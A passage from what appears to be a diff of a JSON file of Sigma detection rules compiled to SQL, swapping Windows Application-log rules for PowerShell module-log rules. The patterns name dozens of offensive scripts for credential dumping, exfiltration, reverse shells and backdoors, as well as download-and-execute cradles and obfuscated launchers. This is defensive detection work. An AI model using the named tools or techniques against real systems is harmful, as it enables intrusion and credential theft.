'\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "title": "Suspicious Get Local Groups Information", + "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.t1219" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_susp_local_group_reco.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + 